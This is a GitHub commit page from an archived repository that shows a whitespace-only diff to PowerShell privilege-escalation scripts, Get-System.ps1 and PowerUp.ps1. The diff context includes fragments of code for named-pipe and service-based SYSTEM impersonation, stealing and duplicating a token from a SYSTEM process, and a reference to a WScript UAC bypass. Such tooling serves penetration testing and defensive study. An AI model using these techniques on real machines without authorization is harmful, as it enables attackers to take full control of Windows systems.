Skip to content
This repository was archived by the owner on Jan 21, 2021. It is now read-only.

Commit 9ed26d6

Browse files
HarmJ0yHarmJ0y
committed
removed whitespace
1 parent cf44439 commit 9ed26d6

File tree

2 files changed

+27
-25
lines changed

2 files changed

+27
-25
lines changed

Privesc/Get-System.ps1

Lines changed: 16 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -111,11 +111,11 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
111111
Param
112112
(
113113
[OutputType([Type])]
114-
114+
115115
[Parameter( Position = 0)]
116116
[Type[]]
117117
$Parameters = (New-Object Type[](0)),
118-
118+
119119
[Parameter( Position = 1 )]
120120
[Type]
121121
$ReturnType = [Void]
@@ -130,7 +130,7 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
130130
$ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
131131
$MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
132132
$MethodBuilder.SetImplementationFlags('Runtime, Managed')
133-
133+
134134
Write-Output $TypeBuilder.CreateType()
135135
}
136136

@@ -140,11 +140,11 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
140140
Param
141141
(
142142
[OutputType([IntPtr])]
143-
143+
144144
[Parameter( Position = 0, Mandatory = $True )]
145145
[String]
146146
$Module,
147-
147+
148148
[Parameter( Position = 1, Mandatory = $True )]
149149
[String]
150150
$Procedure
@@ -161,7 +161,7 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
161161
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
162162
$tmpPtr = New-Object IntPtr
163163
$HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
164-
164+
165165
# Return the address of the function
166166
Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
167167
}
@@ -190,7 +190,7 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
190190
$PipeHandle = $Pipe.SafePipeHandle.DangerousGetHandle()
191191

192192
# Declare/setup all the needed API function
193-
# adapted heavily from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
193+
# adapted heavily from http://www.exploit-monday.com/2012/05/accessing-native-windows-api-in.html
194194
$ImpersonateNamedPipeClientAddr = Get-ProcAddress Advapi32.dll ImpersonateNamedPipeClient
195195
$ImpersonateNamedPipeClientDelegate = Get-DelegateType @( [Int] ) ([Int])
196196
$ImpersonateNamedPipeClient = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateNamedPipeClientAddr, $ImpersonateNamedPipeClientDelegate)
@@ -202,11 +202,11 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
202202
$OpenSCManagerAAddr = Get-ProcAddress Advapi32.dll OpenSCManagerA
203203
$OpenSCManagerADelegate = Get-DelegateType @( [String], [String], [Int]) ([IntPtr])
204204
$OpenSCManagerA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenSCManagerAAddr, $OpenSCManagerADelegate)
205-
205+
206206
$OpenServiceAAddr = Get-ProcAddress Advapi32.dll OpenServiceA
207207
$OpenServiceADelegate = Get-DelegateType @( [IntPtr], [String], [Int]) ([IntPtr])
208208
$OpenServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenServiceAAddr, $OpenServiceADelegate)
209-
209+
210210
$CreateServiceAAddr = Get-ProcAddress Advapi32.dll CreateServiceA
211211
$CreateServiceADelegate = Get-DelegateType @( [IntPtr], [String], [String], [Int], [Int], [Int], [Int], [String], [String], [Int], [Int], [Int], [Int]) ([IntPtr])
212212
$CreateServiceA = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateServiceAAddr, $CreateServiceADelegate)
@@ -298,8 +298,8 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
298298
else{
299299
Write-Verbose '[Get-System] Service successfully deleted'
300300
}
301-
302-
# Step 7 - CloseServiceHandle() for the service handle
301+
302+
# Step 7 - CloseServiceHandle() for the service handle
303303
Write-Verbose '[Get-System] Closing the service handle'
304304
$val = $CloseServiceHandle.Invoke($ServiceHandle)
305305
Write-Verbose '[Get-System] Service handle closed off'
@@ -458,15 +458,15 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
458458
@([IntPtr], [Bool], $TokPriv1LuidStruct.MakeByRefType(),[Int32], [IntPtr], [IntPtr]),
459459
[Runtime.InteropServices.CallingConvention]::Winapi,
460460
'Auto').SetCustomAttribute($AttribBuilder)
461-
461+
462462
$Win32Methods = $Win32TypeBuilder.CreateType()
463463

464464
$Win32Native = [Int32].Assembly.GetTypes() | Where-Object {$_.Name -eq 'Win32Native'}
465465
$GetCurrentProcess = $Win32Native.GetMethod(
466466
'GetCurrentProcess',
467467
[Reflection.BindingFlags] 'NonPublic, Static'
468468
)
469-
469+
470470
$SE_PRIVILEGE_ENABLED = 0x00000002
471471
$STANDARD_RIGHTS_REQUIRED = 0x000F0000
472472
# $STANDARD_RIGHTS_READ = 0x00020000
@@ -509,7 +509,7 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
509509
if(-not($RetVal)) {
510510
Write-Error "[Get-System] AdjustTokenPrivileges failed, RetVal : $RetVal" -ErrorAction Stop
511511
}
512-
512+
513513
$LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value
514514

515515
$SystemHandle = Get-WmiObject -Class Win32_Process | ForEach-Object {
@@ -532,10 +532,10 @@ http://clymb3r.wordpress.com/2013/11/03/powershell-and-token-impersonation/
532532
Write-Verbose "[Get-System] error enumerating handle: $_"
533533
}
534534
} | Where-Object {$_ -and ($_ -ne 0)} | Select-Object -First 1
535-
535+
536536
if ((-not $SystemHandle) -or ($SystemHandle -eq 0)) {
537537
Write-Error '[Get-System] Unable to obtain a handle to a system process.'
538-
}
538+
}
539539
else {
540540
[IntPtr]$SystemToken = [IntPtr]::Zero
541541
$RetVal = $Win32Methods::OpenProcessToken(([IntPtr][Int] $SystemHandle), ($TOKEN_IMPERSONATE -bor $TOKEN_DUPLICATE), [ref]$SystemToken);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()

Privesc/PowerUp.ps1

Lines changed: 11 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -1,11 +1,13 @@
11
<#
2-
PowerUp aims to be a clearinghouse of common Windows privilege escalation
3-
vectors that rely on misconfigurations. See README.md for more information.
42

5-
Author: @harmj0y
6-
License: BSD 3-Clause
7-
Required Dependencies: None
8-
Optional Dependencies: None
3+
PowerUp aims to be a clearinghouse of common Windows privilege escalation
4+
vectors that rely on misconfigurations. See README.md for more information.
5+
6+
Author: @harmj0y
7+
License: BSD 3-Clause
8+
Required Dependencies: None
9+
Optional Dependencies: None
10+
911
#>
1012

1113
#Requires -Version 2
@@ -851,7 +853,7 @@ a modifiable path.
851853
}
852854
else {
853855
# if the path doesn't exist, check if the parent folder allows for modification
854-
$ParentPath = Split-Path -Path $TempPath -Parent -ErrorAction SilentlyContinue
856+
$ParentPath = Split-Path -Path $TempPath -Parent -ErrorAction SilentlyContinue
855857
if ($ParentPath -and (Test-Path -Path $ParentPath)) {
856858
$CandidatePaths += Resolve-Path -Path $ParentPath -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path
857859
}
@@ -4480,7 +4482,7 @@ https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptByp
44804482
Param(
44814483
[String]
44824484
$sSource,
4483-
4485+
44844486
[String]
44854487
$sTarget
44864488
)
@@ -4638,7 +4640,7 @@ https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-WScriptByp
46384640
Invoke-WscriptElevate
46394641
}
46404642
}
4641-
else {
4643+
else {
46424644
Write-Warning '[!] Target machine is not vulnerable.'
46434645
}
46444646
}

0 commit comments

Comments
 (0)